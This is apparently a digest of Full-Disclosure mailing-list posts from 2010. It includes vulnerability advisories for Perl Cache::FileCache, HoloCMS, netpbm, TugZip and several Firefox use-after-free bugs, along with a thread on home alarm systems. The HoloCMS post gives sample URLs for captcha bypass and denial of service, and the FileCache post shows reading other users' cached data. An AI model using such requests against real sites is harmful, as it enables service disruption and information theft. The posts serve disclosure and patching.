Re: [Full-disclosure] FileCache: tmp file permission vulnerability.
Vladimir Lettiev wrote: >> Perl Cache-Cache-1.06 ... stores its default file cache >> in /tmp with world read/write permissions. ... > > This is documented behaviour. You can override insecure default cache > root and umask with options 'cache_root' and 'directory_umask': > use Cache::FileCache; > use File::Temp qw/ tempdir /; > my $cache = new Cache::FileCache( { > 'cache_root' => tempdir('CacheX'), > 'directory_umask' => 077, > } ); The default should be secure. Interested people, with intimate knowledge of inner workings, might go to contortions and change to insecure. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FileCache: tmp file permission vulnerability.
On Thu, Apr 01, 2010 at 11:30:50PM -0400, bugs lists wrote: > > > FileCache: tmp file permission vulnerability. > Larry W. Cashdollar > Vapid Labs http://vapid.dhs.org > 2/16/2010 > > Perl Cache-Cache-1.06 is a memory and file caching module for perl. It > stores its default file cache in /tmp with world read/write permissions. A > local attacker can use this cache to glean information from applications > using module. Regardless of weather the transaction is taking place over an > encrypted SSL session. This is documented behaviour. You can override insecure default cache root and umask with options 'cache_root' and 'directory_umask': use Cache::FileCache; use File::Temp qw/ tempdir /; my $cache = new Cache::FileCache( { 'cache_root' => tempdir('CacheX'), 'directory_umask' => 077, } ); -- Vladimir Lettiev aka crux ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in HoloCMS
Hello Full-Disclosure! I want to warn you about security vulnerabilities in HoloCMS. - Advisory: Vulnerabilities in HoloCMS - URL: http://websecurity.com.ua/4068/ - Timeline: 17.03.2010 - found vulnerabilities. 25.03.2010 - disclosed at my site. 27.03.2010 - informed developers. - Details: These are Insufficient Anti-automation and Denial of Service vulnerabilities. The vulnerabilities exist in captcha script CaptchaSecurityImages.php, which is using in this system. I already reported about vulnerabilities in CaptchaSecurityImages (http://websecurity.com.ua/4043/). Insufficient Anti-automation: http://site/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2 Captcha bypass is possible as via half-automated or automated (with using of OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/), as with using of session reusing with constant captcha bypass method (http://websecurity.com.ua/1551/), which was described in project Month of Bugs in Captchas. Last variant of attack is possible due to incorrect implementation of protection in the system against this captcha bypass method (only in 1.x versions). DoS: http://site/captcha/CaptchaSecurityImages.php?width=1000&height=9000 With setting of large values of width and height it's possible to create large load at the server. Vulnerable are HoloCMS 1.3.1, 3.1 and previous versions. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2026-1] New netpbm-free packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2026-1 secur...@debian.org http://www.debian.org/security/Giuseppe Iuculano April 02, 2010http://www.debian.org/security/faq - Package: netpbm-free Vulnerability : stack-based buffer overflow Problem type : local (remote) Debian-specific: no CVE Id : CVE-2009-4274 Debian Bug : 569060 Marc Schoenefeld discovered a stack-based buffer overflow in the XPM reader implementation in netpbm-free, a suite of image manipulation utilities. An attacker could cause a denial of service (application crash) or possibly execute arbitrary code via an XPM image file that contains a crafted header field associated with a large color index value. For the stable distribution (lenny), this problem has been fixed in version 2:10.0-12+lenny1. For the testing distribution (squeeze), this problem has been fixed in version 2:10.0-12.1+squeeze1. For the unstable distribution (sid), this problem will be fixed soon. Due to a problem with the archive system it is not possible to release all architectures. The missing architectures will be installed into the archive once they become available. We recommend that you upgrade your netpbm-free package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0-12+lenny1.dsc Size/MD5 checksum: 1170 fa9aeb6e0fea3225fd5052b0ec0367a1 http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0.orig.tar.gz Size/MD5 checksum: 1926538 985e9f6d531ac0b2004f5cbebdeea87d http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0-12+lenny1.diff.gz Size/MD5 checksum:50581 1c11ea48609ce48dd8033e076d5600a4 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-12+lenny1_alpha.deb Size/MD5 checksum:85754 ee6a4c6985623b01251b2eea34f3b0ed http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-12+lenny1_alpha.deb Size/MD5 checksum:77066 3f446c0ba741db2fa3bcfd23d364dd49 http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-12+lenny1_alpha.deb Size/MD5 checksum: 1418402 ae06867d12399db5347715dc4ec2a7a9 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-12+lenny1_alpha.deb Size/MD5 checksum: 138666 7a9f884eb231e458af1ecf0f3eccfa95 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9-dev_10.0-12+lenny1_alpha.deb Size/MD5 checksum: 139220 815b677ff56f0ca1d565f9d0ae0fd783 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-12+lenny1_amd64.deb Size/MD5 checksum: 1316736 fcc0ee53a1e98cdd555bf64082dff7de http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-12+lenny1_amd64.deb Size/MD5 checksum: 121202 7b8458cfacab39974af0455f6cd1d740 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-12+lenny1_amd64.deb Size/MD5 checksum:79746 56f418df417d027e2424d57ac6196718 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-12+lenny1_amd64.deb Size/MD5 checksum:71600 0f9251a5ac278afd7c9ac0def7f542aa http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9-dev_10.0-12+lenny1_amd64.deb Size/MD5 checksum: 121328 efaf769ff3769c8253af36a20facd612 arm architecture (ARM) http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-12+lenny1_arm.deb Size/MD5 checksum: 110038 de55f1c7285508902453d36280a3473a http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-12+lenny1_arm.deb Size/MD5 checksum:70448 9258f240185bff2f2aeb6e2acf7abe07 http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-12+lenny1_arm.deb Size/MD5 checksum: 1289442 e2155667bdef26b4a56082d1954aede2 http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-12+lenny1_arm.deb Size/MD5 checksum:62610 88cb6d123e7585524c455f84cf7eee06 http://security.debian.org/pool/updates/main
Re: [Full-disclosure] Security system
Fucking love it On Tue, Mar 30, 2010 at 3:30 PM, T Biehn wrote: > Buy a prepaid cell, rig your comp & phone up to a battery backup. > Breakout board on your Serial port, or from a USB-DB9 RS232 adapter. > > Have the text messaged banged out on the prepaid, rig wires from the > breakout board to the cell phone, rig wires from your security sensors > into your breakout board. App to listen on com port send a nice high > signal to the pin connecting to your send key. > > Done. > > Like, 50$ for the phone incld. minutes. > Like less than 20$ for a breakout board. > > Also, rig the ringer up to an input on the breakout board and you can > call your phone to clear your FDE keys from RAM and kill your machine > if you think the man is paying a visit once you get a text :) > > Some adversaries will cut net, hardline, sometimes power. > > Attacks: GSM jammers, which everyone has. > > -Travis > > On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar wrote: >> Try arduino + internet. >> >> 2010/3/27 >>> >>> Any one got any ides how I would program a system to call me from a >>> voip network to alert me of a home security breach. >>> >>> Sent from my iPhone >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > -- > FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C > http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on > http://pastebin.com/f6fd606da > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- A man goes to the doctor. Says he's depressed. He says life seems harsh and cruel. Says he feels all alone in a threatening world where what lies ahead is vague and uncertain. The doctor says "The treatment is simple. The great clown Pagliacci is in town tonight. Go and see him, that should pick you up." The man bursts into tears. He says "But doctor... I am Pagliacci." ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FileCache: tmp file permission vulnerability.
FileCache: tmp file permission vulnerability. Larry W. Cashdollar Vapid Labs http://vapid.dhs.org 2/16/2010 Perl Cache-Cache-1.06 is a memory and file caching module for perl. It stores its default file cache in /tmp with world read/write permissions. A local attacker can use this cache to glean information from applications using module. Regardless of weather the transaction is taking place over an encrypted SSL session. r...@dev-unix-sec01:/tmp# ls -l --color=no total 200 drwxrwxrwx 3 root root 4096 Feb 10 12:53 FileCache r...@dev-unix-sec01:/tmp/FileCache/Default# ls -l --color=no total 64 drwxrwxrwx 17 root root 4096 Feb 11 16:10 0 drwxrwxrwx 18 root root 4096 Feb 10 15:50 1 drwxrwxrwx 18 root root 4096 Feb 11 16:11 2 drwxrwxrwx 16 root root 4096 Feb 11 16:09 3 drwxrwxrwx 18 root root 4096 Feb 10 15:51 4 drwxrwxrwx 17 root root 4096 Feb 11 16:09 5 drwxrwxrwx 18 root root 4096 Feb 10 15:51 6 drwxrwxrwx 15 root root 4096 Feb 11 16:09 7 drwxrwxrwx 17 root root 4096 Feb 10 15:51 8 drwxrwxrwx 18 root root 4096 Feb 11 16:10 9 drwxrwxrwx 17 root root 4096 Feb 10 15:51 a drwxrwxrwx 17 root root 4096 Feb 11 16:09 b drwxrwxrwx 17 root root 4096 Feb 11 16:10 c drwxrwxrwx 18 root root 4096 Feb 11 16:11 d drwxrwxrwx 17 root root 4096 Feb 11 16:09 e drwxrwxrwx 16 root root 4096 Feb 11 16:10 f r...@dev-unix-sec01:/tmp/FileCache/Default/f/f/9# ls -l --color=no total 64 -rw-r--r-- 1 root root 8035 Feb 12 08:39 ff9984b83c656ad4884e116bcf60fdca16be6483 -rw-r--r-- 1 root root 51521 Feb 12 08:37 ff9ebcc002b4067391f0baae96c3e23e8ef248a8 r...@dev-unix-sec01:/tmp/FileCache/Default/f/f/9# r...@dev-unix-sec01:/tmp/FileCache/Default/f/f/9# strings ff9984b83c656ad4884e116bcf60fdca16be6483 |more prod-mail-list02.example.com Cache::Object _Size Kv _Expires_At _KeyKuZ _Created_At adduser-3.105ubuntu1 apache2-2.2.8-1ubuntu0.11 apache2.2-common-2.2.8-1ubuntu0.11 apache2-mpm-worker-2.2.8-1ubuntu0.11 apache2-utils-2.2.8-1ubuntu0.11 apt-0.7.9ubuntu17.2 aptitude-0.4.9-2ubuntu5 apt-utils-0.7.9ubuntu17.2 at-3.1.10ubuntu4 atsar-1.7-2 base-files-4.0.1ubuntu5.8.04.7 base-passwd-3.5.16 This can be fixed with a simple patch: la...@brazil:~/Desktop/Cache-Cache-1.06/lib/Cache$ diff -Nur FileCache.pm 1 --- FileCache.pm2009-02-28 19:53:14.0 -0500 +++ 1 2010-02-12 21:13:31.0 -0500 @@ -35,7 +35,7 @@ # by default, the root of the cache is located in 'FileCache'. On a # UNIX system, this will appear in "/tmp/FileCache/" -my $DEFAULT_CACHE_ROOT = "FileCache"; +my $DEFAULT_CACHE_ROOT = qw(FileCache_) . $>; # by default, the directories in the cache on the filesystem should @@ -43,7 +43,7 @@ # potential security concern, the actual cache entries are written # with the user's umask, thus reducing the risk of cache poisoning -my $DEFAULT_DIRECTORY_UMASK = 000; +my $DEFAULT_DIRECTORY_UMASK = 077; sub Clear Cache::cache is no longer being developed, http://search.cpan.org/~jswartz/CHI-0.34/lib/CHI.pm should be used instead. http://vapid.dhs.org/w/doku.php?id=perl_cache:cache_filecache_permissions_issue ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apple patent lawyers fail to close ddtek, Defcon CTF goes on
FOR IMMEDIATE RELEASE 1 APRIL 2010 DEFCON CTF QUALIFIER ANNOUNCED Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFON 18 CTF. Stock up on Red Bull, put the pizza delivery on speed dial, polish up your fancy shellcodes, and replenish the duct tape supply. The competition for these coveted spots will be held over 55 non-stop hours 21-24 May. When the dust clears only the 10 best will be invited to join us this summer in sin city for the annual DEFCON deathmatch. In historical fashion VedaGodz will be automatically be permitted contest entry. However, we wish to point out that real ninjas would still attempt to qualify. The qualification round will again be in the style of game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking across a vast realm of security. This isn't CTF like your mama used to make. Level 1 questions make CISSPs turn red, Level 2 make SANS Fellows cry in frustration, Level 3 are typically only answerable by sheep of above average barnyard intelligence, you get the idea. Pause your atari emulator and hop over the ddtek.biz to register. Only those that pre-register are permitted to play. Registration site: http://ddtek.biz/register.html Registration opens: 01 Apr 2010 00:00:00 UTC Registration ends: 20 May 2010 00:00:00 UTC Qualifications open: 21 May 2010 19:00:00 UTC Qualifications ends: 24 May 2010 02:00:00 UTC More information that will follow via your registered email address. Those with SANS certs need not apply. CISSPs are right out.* v...@n Difensiva Senior Engineer Diuntinus Defense Technologies, Inc. *CEH holders...well, we sorta feel a little bit sorry for those that admit to holding this cert and abstain from mocking. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORELAN]-10-018 - TugZip 3.5
|--| | __ __ | | _ / /___ _ / / _ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | | |-[ EIP Hunters ]--| Advisory: CORELAN-10-018 Disclosure date : April 1st, 2010 http://www.corelan.be:8800/advisories.php?id=CORELAN-10-018 00 : Vulnerability information Product : TugZip Version : 3.5.0.0 (latest version) Vendor : Christian Kindahl / tugzip.com URL : http://www.tugzip.com/index.php?page=downloads Platform : Windows Type of vulnerability : Stack overflow Risk rating : High Issue fixed in version : Vulnerability discovered by : Lincoln Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/ 01 : Vendor description of software >From the vendor website: "TUGZip is a powerful award-winning freeware archiving utility for Windows that provides support for a wide range of compressed, encoded and disc-image files, as well as very powerful features; all through an easy to use application interface and Windows Explorer integration.Try this great free archiving utility!" 02 : Vulnerability details When a specially crafted zip file is opened by TugZip, an exception handler gets overwritten, allowing to trigger arbitraty code execution. There are a few ways to trigger the vulnerability : - open the zip file from within TugZip - associate zip files with TugZip and double-click on the zip file - associate zip files with TugZip and open a zip file from a URL No user intervention is required (except for opening the file) to gain code execution. 03 : Author/Vendor communication March 23 2010 : author contacted March 28 2010 : sent reminder April 1 2010 : No response, public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security system
Good, they have minds of their own. On Fri, Apr 2, 2010 at 3:03 PM, T Biehn wrote: > Can't hurt. > I don't trust machines in DCs much less VPSs. > > An adversary with the resources and motivation to kill power, net, and > jam GSM when they're pwning your house would probably be able to know > about and take out your watchdog box in the same move. > > -Travis > > On Fri, Apr 2, 2010 at 9:46 AM, Haris Pilton > wrote: > > On Tuesday, March 30, 2010, T Biehn wrote: > >> Nah, I'm saying a GSM jammer would block your prepaid cell signal. > >> > >> So if your adversary were to cut the power, cut the net AND jam GSM > >> you'd be out of luck in getting notification. > > > > Very tru, tho u can combine this with a remote box that reacts iff it > > no longer cant reach ur home box. Tht wy they cant just block outgoing > > signals n be clear > > > >> > >> You can get all fancy and have your program try all methods available. > >> Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc. > >> > >> -Travis > >> > >> On Tue, Mar 30, 2010 at 10:39 AM, wrote: > >>> Good idea u saying also I should by a gsm jammer this a good idea I > will > >>> try. > >>> > >>> Sent from my iPhone > >>> > >>> On Mar 30, 2010, at 11:30 AM, T Biehn wrote: > >>> > Buy a prepaid cell, rig your comp & phone up to a battery backup. > Breakout board on your Serial port, or from a USB-DB9 RS232 adapter. > > Have the text messaged banged out on the prepaid, rig wires from the > breakout board to the cell phone, rig wires from your security sensors > into your breakout board. App to listen on com port send a nice high > signal to the pin connecting to your send key. > > Done. > > Like, 50$ for the phone incld. minutes. > Like less than 20$ for a breakout board. > > Also, rig the ringer up to an input on the breakout board and you can > call your phone to clear your FDE keys from RAM and kill your machine > if you think the man is paying a visit once you get a text :) > > Some adversaries will cut net, hardline, sometimes power. > > Attacks: GSM jammers, which everyone has. > > -Travis > > On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar > wrote: > > > > Try arduino + internet. > > > > 2010/3/27 > >> > >> Any one got any ides how I would program a system to call me from a > >> voip network to alert me of a home security breach. > >> > >> Sent from my iPhone > >> > >> ___ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C > > http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on > http://pastebin.com/f6fd606da > >>> > >> > >> > >> > >> -- > >> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C > >> > http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on > >> http://pastebin.com/f6fd606da > >> > >> ___ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > >> > > > > > > -- > FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C > http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on > http://pastebin.com/f6fd606da > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Non ZDI Post - EOM
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security system
> An adversary with the resources and motivation to kill power, net, and > jam GSM when they're pwning your house would probably be able to know > about and take out your watchdog box in the same move. > Reminds me of the adage "Locks keep honest people honest". Dream up all the fancy security and countermeasures you want .. but it still makes more sense to just take reasonable proactive steps to make your house less attractive to burglars than the ones nextdoor .. and have good insurance. The geeky stuff is more fun to think up and implement, but trimming the hedges and installing some exterior lights works better. Cheers, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-050: Mozilla Firefox nsTreeSelection EventListener Remote Code Execution Vulnerability
ZDI-10-050: Mozilla Firefox nsTreeSelection EventListener Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-050 April 2, 2010 -- CVE ID: CVE-2010-0175 -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 3.5.x -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on software utilizing a vulnerable version of Mozilla's Firefox. User interaction is required in that the victim must visit a malicious website or be coerced into opening a malicious document. The specific flaw exists within how the application handles particular events for an nsTreeSelection element. Upon execution of a "select" event the application will access an element without checking to see if it's been previously freed or not. Successful exploitation can lead to code execution under the context of the application. -- Vendor Response: Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at: http://www.mozilla.org/security/announce/2010/mfsa2010-17.html -- Disclosure Timeline: 2010-01-15 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * regenrecht -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-049: Mozilla Firefox PluginArray nsMimeType Dangling Pointer Remote Code Execution Vulnerability
ZDI-10-049: Mozilla Firefox PluginArray nsMimeType Dangling Pointer Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-049 April 2, 2010 -- CVE ID: CVE-2010-0177 -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 3.5.x -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that a user must be coerced to viewing a malicious document. The specific flaw exists within the way the application implements the window.navigator.plugins array. Due to the application freeing the contents of the array while a reference to one of the elements is still being used, an attacker can utilize the free reference to call arbitrary code. Successful exploitation can lead to code execution under the context of the application. -- Vendor Response: Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at: http://www.mozilla.org/security/announce/2010/mfsa2010-19.html -- Disclosure Timeline: 2010-01-06 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * regenrecht -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-048: Mozilla Firefox nsTreeContentView Dangling Pointer Remote Code Execution Vulnerability
ZDI-10-048: Mozilla Firefox nsTreeContentView Dangling Pointer Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-048 April 2, 2010 -- CVE ID: CVE-2010-0176 -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 3.5.x -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required in that the victim must visit a malicious website or be coerced into opening a malicious document. The specific flaw exists within the way that Mozilla's Firefox parses .XUL files. While appending a particular tag to a treechildren container, the application will create more than one reference to a particular element without increasing its reference count. Upon removal of one of the elements, the refcount will be decreased causing the application to free the memory associated with the object. Due to the rogue reference occurring, the next time the application attempts to reference that container, the application will access memory that has been freed which can lead to code execution under the context of the application. -- Vendor Response: Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at: http://www.mozilla.org/security/announce/2010/mfsa2010-18.html -- Disclosure Timeline: 2010-01-06 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * regenrecht -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-047: Mozilla Firefox libpr0n imgContainer Bits-Per-Pixel Change Remote Code Execution Vulnerability
ZDI-10-047: Mozilla Firefox libpr0n imgContainer Bits-Per-Pixel Change Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-047 April 2, 2010 -- CVE ID: CVE-2010-0164 -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 3.6.x -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9620. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the libpr0n library which is responsible for handling image caching and animation and is due to the way the application handles animations received from the server via the multipart/x-mixed-replace mimetype. During a case where the bits-per-pixel changes, the application will free a pointer and then can be made to reuse the freed pointer later. This can lead to code execution under the context of the application. -- Vendor Response: Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at: http://www.mozilla.org/security/announce/2010/mfsa2010-09.html -- Disclosure Timeline: 2010-02-18 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * regenrecht -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-046: Mozilla Firefox Web Worker Array Remote Code Execution Vulnerability
ZDI-10-046: Mozilla Firefox Web Worker Array Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-046 April 2, 2010 -- CVE ID: CVE-2010-0160 -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 3.6.x -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9619. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists within the implementation of web worker threads. Due to mishandling the array data type while processing posted messages, a web worker thread can be made to corrupt heap memory. An attacker can exploit this vulnerability to execute arbitrary code under the context of the user running the browser. -- Vendor Response: Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at: 